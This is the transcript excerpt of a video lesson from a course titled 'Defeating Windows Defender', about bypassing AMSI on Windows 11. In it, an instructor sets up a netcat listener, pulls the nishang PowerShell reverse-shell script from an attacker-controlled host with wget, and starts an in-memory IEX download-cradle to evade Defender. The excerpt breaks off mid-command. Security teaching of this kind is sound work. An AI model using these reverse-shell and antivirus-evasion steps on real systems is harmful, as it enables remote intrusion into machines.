From the course: Defeating Windows Defender
Join today to access over 25,500 courses taught by industry experts.
Disrupting the AmsiOpenSession function - Microsoft Defender Tutorial
From the course: Defeating Windows Defender
Disrupting the AmsiOpenSession function
- [Instructor] Our objective in this video is to demonstrate how we can bypass the AMSI checks by setting up a reverse shell. Note that we have a web service open in Kali already. And we'll now set up a listener for our reverse shell with nc -lp on port 4444. We didn't have much luck downloading our MSFvenom command line shell. However, we can run a reverse shell from within PowerShell by using the nishang PowerShellTcp script from the website shown here. I've downloaded this script onto my Kali system, so let's try to download it from there. I've got a PowerShell session open in Windows 11, so we can (keyboard clicking) wget http://192.168.1.249:8000/ Invoke-PowerShellTcp.ps1 - outfile Invoke-PowerShellTcp.ps1. And we get it, but we're stopped by Defender. One of the strategies for defeating Defender is to run scripts in memory and not write them to disk. We can do this with PowerShell scripts by using the IEX command. Let's try this for PowerShell TCP. IEX new-object net.WebClient…
Practice while you learn with exercise files
Download the files the instructor uses to teach the course. Follow along and learn by watching, listening and practicing.
Download courses and learn on the go
Watch courses on your mobile device without an internet connection. Download courses using your iOS or Android LinkedIn Learning app.